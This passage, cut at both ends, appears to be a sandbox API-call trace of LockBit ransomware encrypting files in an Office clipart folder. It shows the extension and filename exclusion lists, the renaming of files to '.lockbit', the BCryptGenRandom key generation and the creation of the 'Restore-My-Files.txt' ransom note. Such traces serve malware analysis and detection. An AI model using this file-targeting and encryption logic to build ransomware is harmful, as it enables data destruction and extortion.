(lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.826] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.827] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.827] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.827] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.827] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.844] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.748] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.748] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.805] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.805] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.805] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.805] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.805] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.805] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200279.WMF") returned 1 [0151.806] lstrcmpiW (lpString1="ntldr", lpString2="J0200279.WMF") returned 1 [0151.806] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200279.WMF") returned 1 [0151.806] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200279.WMF") returned -1 [0151.806] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200279.WMF") returned -1 [0151.806] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200279.WMF") returned 1 [0151.806] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200279.WMF") returned -1 [0151.806] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.806] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF") returned=".WMF" [0151.806] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.806] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.806] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.807] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.807] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF.lockbit") returned 72 [0151.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200279.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0151.895] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.895] malloc (_Size=0x40068) returned 0x3df0008 [0151.895] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19466) returned 1 [0151.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.896] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0151.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0151.897] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0151.899] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.899] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.899] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.900] free (_Block=0x1fa2ed8) [0151.900] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.900] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.900] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.901] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb379af00, ftCreationTime.dwHighDateTime=0x1be3e98, ftLastAccessTime.dwLowDateTime=0x56583130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb379af00, ftLastWriteTime.dwHighDateTime=0x1be3e98, nFileSizeHigh=0x0, nFileSizeLow=0xa0b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200289.WMF", cAlternateFileName="")) returned 1 [0151.901] lstrcmpiW (lpString1=".", lpString2="J0200289.WMF") returned -1 [0151.901] lstrcmpiW (lpString1="..", lpString2="J0200289.WMF") returned -1 [0151.901] PathFindExtensionW (pszPath="J0200289.WMF") returned=".WMF" [0151.901] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0151.901] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.902] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.902] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.903] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200289.WMF") returned 1 [0151.903] lstrcmpiW (lpString1="ntldr", lpString2="J0200289.WMF") returned 1 [0151.903] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200289.WMF") returned 1 [0151.903] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200289.WMF") returned -1 [0151.903] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200289.WMF") returned -1 [0151.903] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200289.WMF") returned 1 [0151.903] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200289.WMF") returned -1 [0151.903] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.913] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF") returned=".WMF" [0151.913] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.913] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.913] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.914] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.915] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF.lockbit") returned 72 [0151.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200289.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0151.916] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.916] malloc (_Size=0x40068) returned 0x1ff1e60 [0151.916] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=41136) returned 1 [0151.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.916] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0151.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0151.917] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0151.919] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0151.919] malloc (_Size=0xa6) returned 0x1fa2ed8 [0151.920] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0151.921] free (_Block=0x1fa2ed8) [0151.921] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0151.921] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0151.921] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0151.921] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec38100, ftCreationTime.dwHighDateTime=0x1be3e99, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ec38100, ftLastWriteTime.dwHighDateTime=0x1be3e99, nFileSizeHigh=0x0, nFileSizeLow=0x4f08, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0200377.WMF", cAlternateFileName="")) returned 1 [0151.921] lstrcmpiW (lpString1=".", lpString2="J0200377.WMF") returned -1 [0151.921] lstrcmpiW (lpString1="..", lpString2="J0200377.WMF") returned -1 [0151.921] PathFindExtensionW (pszPath="J0200377.WMF") returned=".WMF" [0151.921] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0151.921] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0151.921] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0151.921] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0151.921] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0151.921] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0151.921] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0151.922] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0151.922] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0151.923] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0200377.WMF") returned 1 [0151.923] lstrcmpiW (lpString1="ntldr", lpString2="J0200377.WMF") returned 1 [0151.923] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0200377.WMF") returned 1 [0151.923] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0200377.WMF") returned -1 [0151.923] lstrcmpiW (lpString1="autorun.inf", lpString2="J0200377.WMF") returned -1 [0151.923] lstrcmpiW (lpString1="thumbs.db", lpString2="J0200377.WMF") returned 1 [0151.924] lstrcmpiW (lpString1="iconcache.db", lpString2="J0200377.WMF") returned -1 [0151.924] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0151.924] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF") returned=".WMF" [0151.924] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0151.924] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0151.924] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0151.925] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0151.925] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF.lockbit") returned 72 [0151.925] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200377.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0151.926] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0151.926] malloc (_Size=0x40068) returned 0x3d70450 [0151.926] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: 